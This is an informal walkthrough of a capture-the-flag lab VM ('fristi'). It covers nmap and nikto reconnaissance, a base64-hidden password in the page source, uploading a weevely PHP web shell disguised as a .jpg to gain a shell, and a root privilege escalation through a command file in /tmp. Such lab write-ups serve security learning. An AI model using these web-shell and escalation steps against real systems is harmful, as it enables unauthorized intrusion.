After seting up the host on virtualbox we start to scan it with NMAP :
Nmap –A –T4 –p- 192.168.1.18 –vv
Only port 80 is open so we fire up the browser to see the webpage
Download the picture to my kali and use the exiftool tool to see if there anything useful inside of , also CAT the picture but nothing to find there … so the next step is to nikto :
As you can see I found the robot.txt file and it contains 3 locations to visit and the three locations got some pictures but nothing important about them ….
Lets visit the host name it self /fristi
A login page with username and password … I ran dirb and burpsuite .. but what I found was in the page source as, you can find a name to use as the username and a big code which is a 64code …
The name is eezeepz … we going to use it as login username
We need to decode this big chunck of code using base64 command:
cat code_file | base64 –decode > pic.png
file pic.png
Then open the image and take a look at it and it looks like a password along with the user name eezeepz we found earlier
Using the username and password took me to a webpage with the ability to upload a file… so lets upload a script to gain a shell
I use weevely to get a shell using the following commands:
Weevely generate 123456 shell.php
Then changed the name of the file to shell.php.jpg
Upload the file and you will get a page with a message saying the file is uploaded to /uploads
`Go back to weevely and past the link to the file you uploaded :
Weevely http://192.168.1.1/fristi/uploads/shell.php.jpg 123456
You will get a shell after that
Now we need to priv escalation to gain root access
Listing the home directories found a file notes.txt , inside it some instructions on how to run some commands with root privilege
Initiating this command will give you access to the admin directory
echo “/home/admin/chmod -R 7777 /home/admin” > /tmp/runthis
cd /home/admin
ls
Cat whoisyourgodnow.txt
You we got the flag!!
